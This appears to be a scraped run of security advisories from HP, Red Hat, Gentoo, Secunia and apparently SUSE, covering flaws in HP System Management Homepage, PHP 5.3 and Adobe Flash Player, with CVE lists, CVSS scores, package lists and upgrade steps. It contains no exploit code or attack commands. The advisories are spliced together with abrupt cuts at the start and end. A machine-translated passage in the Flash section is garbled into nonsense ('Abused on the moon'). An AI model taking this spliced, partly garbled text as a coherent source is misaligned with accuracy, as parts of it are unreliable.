http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03839862 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03839862 Version: 1 HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-18 Last Updated: 2013-07-18 Potential Security Impact: Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain extended privileges, disclosure of information, unauthorized access, XSS Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain privileges, disclosure of information, unauthorized access, or XSS. References: CVE-2011-3389 (SSRT100740) Remote disclosure of information CVE-2012-0883 (SSRT101209) Remote gain extended privileges CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS) CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS) CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS) CVE-2013-2355 (SSRT100696) Remote unauthorized Access CVE-2013-2356 (SSRT100835) Remote disclosure of information CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2361 (SSRT101007) XSS CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS) CVE-2013-2363 (SSRT101150) Remote disclosure of information CVE-2013-2364 (SSRT101151) XSS CVE-2013-5217 (SSRT101137) Remote unauthorized access SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0883 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2110 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2311 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2329 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-2335 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2336 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2355 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-2356 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8 CVE-2013-2357 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2358 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2359 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2360 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2361 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2362 (AV:L/AC:H/Au:S/C:N/I:N/A:P) 1.0 CVE-2013-2363 (AV:N/AC:H/Au:N/C:C/I:N/A:P) 6.1 CVE-2013-2364 (AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0 CVE-2013-5217 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks agix for working with the TippingPoint Zero Day Initiative to report vulnerability CVE-2013-2362 to security-alert@hp.com RESOLUTION HP has made System Management Homepage (SMH) v7.2.1 or subsequent available for Windows and Linux to resolve the vulnerabilities. Information and updates for SMH can be found at the following location: http://h18013.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) - 18 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: php53 security update Advisory ID: RHSA-2012:1047-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1047.html Issue date: 2012-06-27 CVE Names: CVE-2010-2950 CVE-2011-4153 CVE-2012-0057 CVE-2012-0789 CVE-2012-1172 CVE-2012-2143 CVE-2012-2336 CVE-2012-2386 ===================================================================== 1. Summary: Updated php53 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 3. Description: PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user running PHP, if a PHP script processed untrusted eXtensible Style Sheet Language Transformations (XSLT) content. (CVE-2012-0057) Note: This update disables file writing by default. A new PHP configuration directive, "xsl.security_prefs", can be used to enable file writing in XSLT. A flaw was found in the way PHP validated file names in file upload requests. A remote attacker could possibly use this flaw to bypass the sanitization of the uploaded file names, and cause a PHP script to store the uploaded file in an unexpected directory, by using a directory traversal attack. (CVE-2012-1172) Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way the PHP phar extension processed certain fields of tar archive files. A remote attacker could provide a specially-crafted tar archive file that, when processed by a PHP application using the phar extension, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running PHP. (CVE-2012-2386) A format string flaw was found in the way the PHP phar extension processed certain PHAR files. A remote attacker could provide a specially-crafted PHAR file, which once processed in a PHP application using the phar extension, could lead to information disclosure and possibly arbitrary code execution via a crafted phar:// URI. (CVE-2010-2950) A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. (CVE-2012-2143) Note: With this update, passwords are no longer truncated when performing DES hashing. Therefore, new hashes of the affected passwords will not match stored hashes generated using vulnerable PHP versions, and will need to be updated. It was discovered that the fix for CVE-2012-1823, released via RHSA-2012:0547, did not properly filter all php-cgi command line arguments. A specially-crafted request to a PHP script could cause the PHP interpreter to execute the script in a loop, or output usage information that triggers an Internal Server Error. (CVE-2012-2336) A memory leak flaw was found in the PHP strtotime() function call. A remote attacker could possibly use this flaw to cause excessive memory consumption by triggering many strtotime() function calls. (CVE-2012-0789) It was found that PHP did not check the zend_strndup() function's return value in certain cases. A remote attacker could possibly use this flaw to crash a PHP application. (CVE-2011-4153) Upstream acknowledges Rubin Xu and Joseph Bonneau as the original reporters of CVE-2012-2143. All php53 users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 782657 - CVE-2012-0057 php: XSLT file writing vulnerability 782943 - CVE-2011-4153 php: zend_strndup() NULL pointer dereference may cause DoS 783609 - CVE-2012-0789 php: strtotime timezone memory leak 799187 - CVE-2012-1172 php: $_FILES array indexes corruption 816956 - CVE-2012-2143 BSD crypt(): DES encrypted password weakness 820708 - CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h 823594 - CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension 835024 - CVE-2010-2950 php: Format string flaw in phar extension via phar_stream_flush() (MOPS-2010-024) 6. Package List: RHEL Desktop Workstation (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/php53-5.3.3-13.el5_8.src.rpm i386: php53-5.3.3-13.el5_8.i386.rpm php53-bcmath-5.3.3-13.el5_8.i386.rpm php53-cli-5.3.3-13.el5_8.i386.rpm php53-common-5.3.3-13.el5_8.i386.rpm php53-dba-5.3.3-13.el5_8.i386.rpm php53-debuginfo-5.3.3-13.el5_8.i386.rpm php53-devel-5.3.3-13.el5_8.i386.rpm php53-gd-5.3.3-13.el5_8.i386.rpm php53-imap-5.3.3-13.el5_8.i386.rpm php53-intl-5.3.3-13.el5_8.i386.rpm php53-ldap-5.3.3-13.el5_8.i386.rpm php53-mbstring-5.3.3-13.el5_8.i386.rpm php53-mysql-5.3.3-13.el5_8.i386.rpm php53-odbc-5.3.3-13.el5_8.i386.rpm php53-pdo-5.3.3-13.el5_8.i386.rpm php53-pgsql-5.3.3-13.el5_8.i386.rpm php53-process-5.3.3-13.el5_8.i386.rpm php53-pspell-5.3.3-13.el5_8.i386.rpm php53-snmp-5.3.3-13.el5_8.i386.rpm php53-soap-5.3.3-13.el5_8.i386.rpm php53-xml-5.3.3-13.el5_8.i386.rpm php53-xmlrpc-5.3.3-13.el5_8.i386.rpm x86_64: php53-5.3.3-13.el5_8.x86_64.rpm php53-bcmath-5.3.3-13.el5_8.x86_64.rpm php53-cli-5.3.3-13.el5_8.x86_64.rpm php53-common-5.3.3-13.el5_8.x86_64.rpm php53-dba-5.3.3-13.el5_8.x86_64.rpm php53-debuginfo-5.3.3-13.el5_8.x86_64.rpm php53-devel-5.3.3-13.el5_8.x86_64.rpm php53-gd-5.3.3-13.el5_8.x86_64.rpm php53-imap-5.3.3-13.el5_8.x86_64.rpm php53-intl-5.3.3-13.el5_8.x86_64.rpm php53-ldap-5.3.3-13.el5_8.x86_64.rpm php53-mbstring-5.3.3-13.el5_8.x86_64.rpm php53-mysql-5.3.3-13.el5_8.x86_64.rpm php53-odbc-5.3.3-13.el5_8.x86_64.rpm php53-pdo-5.3.3-13.el5_8.x86_64.rpm php53-pgsql-5.3.3-13.el5_8.x86_64.rpm php53-process-5.3.3-13.el5_8.x86_64.rpm php53-pspell-5.3.3-13.el5_8.x86_64.rpm php53-snmp-5.3.3-13.el5_8.x86_64.rpm php53-soap-5.3.3-13.el5_8.x86_64.rpm php53-xml-5.3.3-13.el5_8.x86_64.rpm php53-xmlrpc-5.3.3-13.el5_8.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/php53-5.3.3-13.el5_8.src.rpm i386: php53-5.3.3-13.el5_8.i386.rpm php53-bcmath-5.3.3-13.el5_8.i386.rpm php53-cli-5.3.3-13.el5_8.i386.rpm php53-common-5.3.3-13.el5_8.i386.rpm php53-dba-5.3.3-13.el5_8.i386.rpm php53-debuginfo-5.3.3-13.el5_8.i386.rpm php53-devel-5.3.3-13.el5_8.i386.rpm php53-gd-5.3.3-13.el5_8.i386.rpm php53-imap-5.3.3-13.el5_8.i386.rpm php53-intl-5.3.3-13.el5_8.i386.rpm php53-ldap-5.3.3-13.el5_8.i386.rpm php53-mbstring-5.3.3-13.el5_8.i386.rpm php53-mysql-5.3.3-13.el5_8.i386.rpm php53-odbc-5.3.3-13.el5_8.i386.rpm php53-pdo-5.3.3-13.el5_8.i386.rpm php53-pgsql-5.3.3-13.el5_8.i386.rpm php53-process-5.3.3-13.el5_8.i386.rpm php53-pspell-5.3.3-13.el5_8.i386.rpm php53-snmp-5.3.3-13.el5_8.i386.rpm php53-soap-5.3.3-13.el5_8.i386.rpm php53-xml-5.3.3-13.el5_8.i386.rpm php53-xmlrpc-5.3.3-13.el5_8.i386.rpm ia64: php53-5.3.3-13.el5_8.ia64.rpm php53-bcmath-5.3.3-13.el5_8.ia64.rpm php53-cli-5.3.3-13.el5_8.ia64.rpm php53-common-5.3.3-13.el5_8.ia64.rpm php53-dba-5.3.3-13.el5_8.ia64.rpm php53-debuginfo-5.3.3-13.el5_8.ia64.rpm php53-devel-5.3.3-13.el5_8.ia64.rpm php53-gd-5.3.3-13.el5_8.ia64.rpm php53-imap-5.3.3-13.el5_8.ia64.rpm php53-intl-5.3.3-13.el5_8.ia64.rpm php53-ldap-5.3.3-13.el5_8.ia64.rpm php53-mbstring-5.3.3-13.el5_8.ia64.rpm php53-mysql-5.3.3-13.el5_8.ia64.rpm php53-odbc-5.3.3-13.el5_8.ia64.rpm php53-pdo-5.3.3-13.el5_8.ia64.rpm php53-pgsql-5.3.3-13.el5_8.ia64.rpm php53-process-5.3.3-13.el5_8.ia64.rpm php53-pspell-5.3.3-13.el5_8.ia64.rpm php53-snmp-5.3.3-13.el5_8.ia64.rpm php53-soap-5.3.3-13.el5_8.ia64.rpm php53-xml-5.3.3-13.el5_8.ia64.rpm php53-xmlrpc-5.3.3-13.el5_8.ia64.rpm ppc: php53-5.3.3-13.el5_8.ppc.rpm php53-bcmath-5.3.3-13.el5_8.ppc.rpm php53-cli-5.3.3-13.el5_8.ppc.rpm php53-common-5.3.3-13.el5_8.ppc.rpm php53-dba-5.3.3-13.el5_8.ppc.rpm php53-debuginfo-5.3.3-13.el5_8.ppc.rpm php53-devel-5.3.3-13.el5_8.ppc.rpm php53-gd-5.3.3-13.el5_8.ppc.rpm php53-imap-5.3.3-13.el5_8.ppc.rpm php53-intl-5.3.3-13.el5_8.ppc.rpm php53-ldap-5.3.3-13.el5_8.ppc.rpm php53-mbstring-5.3.3-13.el5_8.ppc.rpm php53-mysql-5.3.3-13.el5_8.ppc.rpm php53-odbc-5.3.3-13.el5_8.ppc.rpm php53-pdo-5.3.3-13.el5_8.ppc.rpm php53-pgsql-5.3.3-13.el5_8.ppc.rpm php53-process-5.3.3-13.el5_8.ppc.rpm php53-pspell-5.3.3-13.el5_8.ppc.rpm php53-snmp-5.3.3-13.el5_8.ppc.rpm php53-soap-5.3.3-13.el5_8.ppc.rpm php53-xml-5.3.3-13.el5_8.ppc.rpm php53-xmlrpc-5.3.3-13.el5_8.ppc.rpm s390x: php53-5.3.3-13.el5_8.s390x.rpm php53-bcmath-5.3.3-13.el5_8.s390x.rpm php53-cli-5.3.3-13.el5_8.s390x.rpm php53-common-5.3.3-13.el5_8.s390x.rpm php53-dba-5.3.3-13.el5_8.s390x.rpm php53-debuginfo-5.3.3-13.el5_8.s390x.rpm php53-devel-5.3.3-13.el5_8.s390x.rpm php53-gd-5.3.3-13.el5_8.s390x.rpm php53-imap-5.3.3-13.el5_8.s390x.rpm php53-intl-5.3.3-13.el5_8.s390x.rpm php53-ldap-5.3.3-13.el5_8.s390x.rpm php53-mbstring-5.3.3-13.el5_8.s390x.rpm php53-mysql-5.3.3-13.el5_8.s390x.rpm php53-odbc-5.3.3-13.el5_8.s390x.rpm php53-pdo-5.3.3-13.el5_8.s390x.rpm php53-pgsql-5.3.3-13.el5_8.s390x.rpm php53-process-5.3.3-13.el5_8.s390x.rpm php53-pspell-5.3.3-13.el5_8.s390x.rpm php53-snmp-5.3.3-13.el5_8.s390x.rpm php53-soap-5.3.3-13.el5_8.s390x.rpm php53-xml-5.3.3-13.el5_8.s390x.rpm php53-xmlrpc-5.3.3-13.el5_8.s390x.rpm x86_64: php53-5.3.3-13.el5_8.x86_64.rpm php53-bcmath-5.3.3-13.el5_8.x86_64.rpm php53-cli-5.3.3-13.el5_8.x86_64.rpm php53-common-5.3.3-13.el5_8.x86_64.rpm php53-dba-5.3.3-13.el5_8.x86_64.rpm php53-debuginfo-5.3.3-13.el5_8.x86_64.rpm php53-devel-5.3.3-13.el5_8.x86_64.rpm php53-gd-5.3.3-13.el5_8.x86_64.rpm php53-imap-5.3.3-13.el5_8.x86_64.rpm php53-intl-5.3.3-13.el5_8.x86_64.rpm php53-ldap-5.3.3-13.el5_8.x86_64.rpm php53-mbstring-5.3.3-13.el5_8.x86_64.rpm php53-mysql-5.3.3-13.el5_8.x86_64.rpm php53-odbc-5.3.3-13.el5_8.x86_64.rpm php53-pdo-5.3.3-13.el5_8.x86_64.rpm php53-pgsql-5.3.3-13.el5_8.x86_64.rpm php53-process-5.3.3-13.el5_8.x86_64.rpm php53-pspell-5.3.3-13.el5_8.x86_64.rpm php53-snmp-5.3.3-13.el5_8.x86_64.rpm php53-soap-5.3.3-13.el5_8.x86_64.rpm php53-xml-5.3.3-13.el5_8.x86_64.rpm php53-xmlrpc-5.3.3-13.el5_8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2010-2950.html https://www.redhat.com/security/data/cve/CVE-2011-4153.html https://www.redhat.com/security/data/cve/CVE-2012-0057.html https://www.redhat.com/security/data/cve/CVE-2012-0789.html https://www.redhat.com/security/data/cve/CVE-2012-1172.html https://www.redhat.com/security/data/cve/CVE-2012-2143.html https://www.redhat.com/security/data/cve/CVE-2012-2336.html https://www.redhat.com/security/data/cve/CVE-2012-2386.html https://access.redhat.com/security/updates/classification/#moderate https://rhn.redhat.com/errata/RHSA-2012-0547.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFP6yyDXlSAg2UNWIIRAu2zAKC8ROcChsz1MkTbSM921azTr7x5vACggc8v uQDSWVmKWcYfJwvqolSqJUI= =fzOC -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012. Adobe Flash Player Contains a vulnerability that allows arbitrary code execution. This vulnerability 2012 Year 5 Abused on the moon " Object confusion vulnerability ( object confusion vulnerability)" Related toA third party may be able to execute arbitrary code via a crafted file. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.236" References ========== [ 1 ] CVE-2012-0779 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0779 [ 2 ] CVE-2012-2034 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2034 [ 3 ] CVE-2012-2035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2035 [ 4 ] CVE-2012-2036 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2036 [ 5 ] CVE-2012-2037 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2037 [ 6 ] CVE-2012-2038 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2038 [ 7 ] CVE-2012-2039 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2039 [ 8 ] CVE-2012-2040 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2040 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201206-21.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Adobe Flash Player Object Confusion Vulnerability SECUNIA ADVISORY ID: SA49096 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49096/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49096 RELEASE DATE: 2012-05-07 DISCUSS ADVISORY: http://secunia.com/advisories/49096/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49096/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49096 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to compromise a user's system. No further information is currently available. NOTE: The vulnerability is reportedly being actively exploited in targeted attacks. SOLUTION: Update to a fixed version. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported as a 0-day. ORIGINAL ADVISORY: Adobe (APSB12-09): http://www.adobe.com/support/security/bulletins/apsb12-09.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0688-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0688.html Issue date: 2012-05-23 CVE Names: CVE-2012-0779 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes one security issue is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. This vulnerability is detailed on the Adobe security page APSB12-09, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the specially-crafted SWF content. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.19-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.19-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.19-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.19-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.19-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.19-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.19-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.19-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.19-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.19-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0779.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-09.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPvKXzXlSAg2UNWIIRAqaqAKCS5KXp2ShcerttnPyE9rBOo/PQeQCeMJvO Z4wtYL99s3Eifb3p+HVMqj8= =tMiQ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. For more information: SA49096 SOLUTION: Apply updated packages via the zypper package manager